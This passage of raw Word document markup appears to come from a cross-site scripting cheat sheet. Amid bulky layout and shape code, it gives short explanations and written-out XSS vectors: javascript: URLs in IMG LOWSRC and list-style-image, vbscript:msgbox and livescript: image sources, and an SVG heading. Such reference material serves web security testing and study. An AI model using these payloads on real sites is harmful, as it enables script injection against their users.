                <v:shape id="Freeform 1210" o:spid="_x0000_s1228" style="position:absolute;left:1614;top:241;width:3281;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="328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+wFMgA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF7wX/wzKF3upGS1uNriLFQqGgNC2ityE7&#10;zQazsyG7xvTfdw6F3mZ4b977ZrkefKN66mId2MBknIEiLoOtuTLw9fl6PwMVE7LFJjAZ+KEI69Xo&#10;Zom5DVf+oL5IlZIQjjkacCm1udaxdOQxjkNLLNp36DwmWbtK2w6vEu4bPc2yJ+2xZmlw2NKLo/Jc&#10;XLyB2Wn+/OCKzXb7uNsfJ5e53r0femPubofNAlSiIf2b/67frOBPM8GVb2QEvfo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X7AUyAAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABk&#10;cnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAjQMAAAAA&#10;" path="m3260,182l21,182r-3,-1l,161r,-3l,21,21,,3260,r21,21l3281,161r-18,20l3260,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3260,424;21,424;18,423;0,403;0,400;0,263;21,242;3260,242;3281,263;3281,403;3263,423;3260,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1209" o:spid="_x0000_s1229" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:328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amxMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPyxR6q7v1IDW6ESkKhUIxxoPHaXaS&#10;LGZnY3ar6b93C4Xe5vE+Z7UeXSeuNATrWcPLVIEgrryx3Gg4lrvnVxAhIhvsPJOGHwqwzicPK8yM&#10;v3FB10NsRArhkKGGNsY+kzJULTkMU98TJ672g8OY4NBIM+AthbtOzpSaS4eWU0OLPb21VJ0P307D&#10;5sTF1l4+v/ZFXdiyXCj+mJ+1fnocN0sQkcb4L/5zv5s0f6YW8PtNOkH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mpsT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7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LOWSRC="javascript:alert('XSS')"&gt;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List-style-image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19" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Fairly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>esoteric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dealing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embedding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>images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bulleted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>lists.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work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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directive.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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particularly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>useful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vector:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="12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120015</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4598670" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1204" name="Group 1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8670" cy="116205"/>
                          <a:chOff x="1614" y="189"/>
                          <a:chExt cx="7242" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1205" name="Freeform 1207"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="188"/>
                            <a:ext cx="7242" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8835 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 7242"/>
                              <a:gd name="T2" fmla="+- 0 371 189"/>
                              <a:gd name="T3" fmla="*/ 371 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 7242"/>
                              <a:gd name="T6" fmla="+- 0 371 189"/>
                              <a:gd name="T7" fmla="*/ 371 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 7242"/>
                              <a:gd name="T10" fmla="+- 0 370 189"/>
                              <a:gd name="T11" fmla="*/ 370 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 7242"/>
                              <a:gd name="T14" fmla="+- 0 350 189"/>
                              <a:gd name="T15" fmla="*/ 350 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 7242"/>
                              <a:gd name="T18" fmla="+- 0 347 189"/>
                              <a:gd name="T19" fmla="*/ 347 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 7242"/>
                              <a:gd name="T22" fmla="+- 0 210 189"/>
                              <a:gd name="T23" fmla="*/ 210 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 7242"/>
                              <a:gd name="T26" fmla="+- 0 189 189"/>
                              <a:gd name="T27" fmla="*/ 189 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8835 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 7242"/>
                              <a:gd name="T30" fmla="+- 0 189 189"/>
                              <a:gd name="T31" fmla="*/ 189 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8856 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 7242"/>
                              <a:gd name="T34" fmla="+- 0 210 189"/>
                              <a:gd name="T35" fmla="*/ 210 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8856 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 7242"/>
                              <a:gd name="T38" fmla="+- 0 350 189"/>
                              <a:gd name="T39" fmla="*/ 350 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8838 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 7242"/>
                              <a:gd name="T42" fmla="+- 0 370 189"/>
                              <a:gd name="T43" fmla="*/ 370 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8835 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 7242"/>
                              <a:gd name="T46" fmla="+- 0 371 189"/>
                              <a:gd name="T47" fmla="*/ 37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242" h="183">
                                <a:moveTo>
                                  <a:pt x="722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21" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7242" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7242" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7224" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="722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" name="Text Box 120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88"/>
                            <a:ext cx="72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&lt;STYLE&gt;li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9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{list-style-image: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9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url("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javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;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05" o:spid="_x0000_s1230" style="position:absolute;margin-left:80.7pt;margin-top:9.45pt;width:362.1pt;height:9.15pt;z-index:-15692800;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,189" coordsize="72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">
                <v:shape id="Freeform 1207" o:spid="_x0000_s1231" style="position:absolute;left:1614;top:188;width:7242;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="72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e7GcIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeahKhIlujSFGweNq1l96GzXR3&#10;6WYSNlHX/nojFHqbx/uc1WZ0vbjQEDvPBvRMgSCuve24MfB52r8sQcSEbLH3TAZuFGGznjytsLD+&#10;yiVdqtSIHMKxQANtSqGQMtYtOYwzH4gz9+0HhynDoZF2wGsOd72cK7WQDjvODS0Gem+p/qnOzsBv&#10;2fUhhvNWHT8qrcud/pK1NuZ5Om7fQCQa07/4z32wef5cvcLjm3yCX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h7sZwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m7221,182l21,182r-3,-1l,161r,-3l,21,21,,7221,r21,21l7242,161r-18,20l7221,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7221,371;21,371;18,370;0,350;0,347;0,210;21,189;7221,189;7242,210;7242,350;7224,370;7221,371" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1206" o:spid="_x0000_s1232" type="#_x0000_t202" style="position:absolute;left:1614;top:188;width:72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kytsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTeaqKHpV2NImKhUChdt4cex824&#10;G9xM1k2q6783gtDbPN7nLFaDa8WZ+mA9a5hOFAjiyhvLtYaf8v3lFUSIyAZbz6ThSgFWy9HTAnPj&#10;L1zQeRdrkUI45KihibHLpQxVQw7DxHfEiTv43mFMsK+l6fGSwl0rZ0pl0qHl1NBgR5uGquPuz2lY&#10;/3Kxtaev/XdxKGxZvin+zI5aP4+H9RxEpCH+ix/uD5Pmz1QG92/SC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vkyt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&lt;STYLE&gt;li</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="9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{list-style-image:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="9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url("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javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;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VBscript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</w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1867535" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1201" name="Group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7535" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="2941" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1202" name="Freeform 1204"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="2941" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4534 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2941"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2941"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2941"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2941"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2941"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2941"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2941"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4534 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2941"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4555 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2941"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4555 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2941"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4537 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2941"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4534 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2941"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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941" h="183">
                                <a:moveTo>
                                  <a:pt x="29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920" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2941" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2941" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2923" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29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" name="Text Box 120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1"/>
                            <a:ext cx="294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7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SRC='vbscript:msgbox("XSS")'&gt;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02" o:spid="_x0000_s1233" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:147.05pt;height:9.15pt;z-index:-15692288;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="294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">
                <v:shape id="Freeform 1204" o:spid="_x0000_s1234" style="position:absolute;left:1614;top:241;width:2941;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="294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GPEcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywjedGMOIqmrFFEopYfWFOxxmp0m&#10;0exsuruJyb/vFoTe5vE+Z7MbTCN6cr62rGC5SEAQF1bXXCr4yI/zNQgfkDU2lknBSB5228nDBjNt&#10;b/xO/SmUIoawz1BBFUKbSemLigz6hW2JI/dtncEQoSuldniL4aaRaZKspMGaY0OFLe0rKq6nzij4&#10;+ez6YszH8zpvDl/d5fXsXt5Yqdl0eHoEEWgI/+K7+1nH+WmSwt838QS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RjxHEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m2920,182l21,182r-3,-1l,161r,-3l,21,21,,2920,r21,21l2941,161r-18,20l2920,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2920,424;21,424;18,423;0,403;0,400;0,263;21,242;2920,242;2941,263;2941,403;2923,423;2920,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1203" o:spid="_x0000_s1235" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:294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6RLsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNamC1K1RRFoQhNJ1PfQ43Yy7&#10;wc1k3URd/31TKHibx/ucxap3jbhSF6xnDS9jBYK49MZypeFQfDy/gggR2WDjmTTcKcBqOXhaYGb8&#10;jXO67mMlUgiHDDXUMbaZlKGsyWEY+5Y4cUffOYwJdpU0Hd5SuGvkRKmZdGg5NdTY0qam8rS/OA3r&#10;b87f7fnz5ys/5rYo5op3s5PWo2G/fgMRqY8P8b97a9L8iZrC3zfp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6RL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67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SRC='vbscript:msgbox("XSS")'&gt;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spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Livescript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(older</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>versions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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>only)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1597660" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1198" name="Group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7660" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="2516" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1199" name="Freeform 1201"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="2516" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4108 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2516"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2516"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2516"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2516"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2516"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2516"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2516"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4108 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2516"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4129 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2516"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4129 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2516"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4111 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2516"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4108 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2516"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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16" h="183">
                                <a:moveTo>
                                  <a:pt x="249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494" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2515" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2515" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2497" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="249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" name="Text Box 1200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1"/>
                            <a:ext cx="251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SRC="livescript:[code]"&gt;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9" o:spid="_x0000_s1236" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:125.8pt;height:9.15pt;z-index:-15691776;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="251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">
                <v:shape id="Freeform 1201" o:spid="_x0000_s1237" style="position:absolute;left:1614;top:241;width:2516;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="251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7cWsEA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H+x/CCf4NlMniHZGccOqr+sGez2aMy02&#10;l5JEW/97Iwh7u4/v5602g23FlXxoHCuYTjIQxJXTDRsFvz/F2wJEiMgaW8ek4EYBNuvXlxXm2vX8&#10;TdcyGpFCOOSooI6xy6UMVU0Ww8R1xIk7OW8xJuiN1B77FG5b+Z5lc2mx4dRQY0dfNVXn8mIVFIUz&#10;+08z3PrZwSyK7e7gz3+s1Hg0bD9ARBriv/jpPuo0f7pcwuObdIJ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+3FrBAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m2494,182l21,182r-3,-1l,161r,-3l,21,21,,2494,r21,21l2515,161r-18,20l2494,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2494,424;21,424;18,423;0,403;0,400;0,263;21,242;2494,242;2515,263;2515,403;2497,423;2494,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1200" o:spid="_x0000_s1238" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:251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PWcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBCF7wv+hzCCtzXVg7jVKCIuCIJY68Hj2Ixt&#10;sJl0m6j135uFhb3N8N775s182dlaPKj1xrGC0TABQVw4bbhUcMq/P6cgfEDWWDsmBS/ysFz0PuaY&#10;avfkjB7HUIoIYZ+igiqEJpXSFxVZ9EPXEEft6lqLIa5tKXWLzwi3tRwnyURaNBwvVNjQuqLidrxb&#10;BaszZxvzs78csmtm8vwr4d3kptSg361mIAJ14d/8l97qWD8i4febOIJc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D1n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5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SRC="livescript:[code]"&gt;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SVG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Tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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2521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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1381125" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1195" name="Group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1125" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="2175" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1196" name="Freeform 1198"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="2175" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3768 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2175"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2175"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2175"/>
                              <a:gd name="T10" fmla="+- 0 424 242"/>
                              <a:gd name="T11" fmla="*/ 424 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2175"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2175"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2175"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2175"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3768 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2175"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3789 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2175"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3789 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2175"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
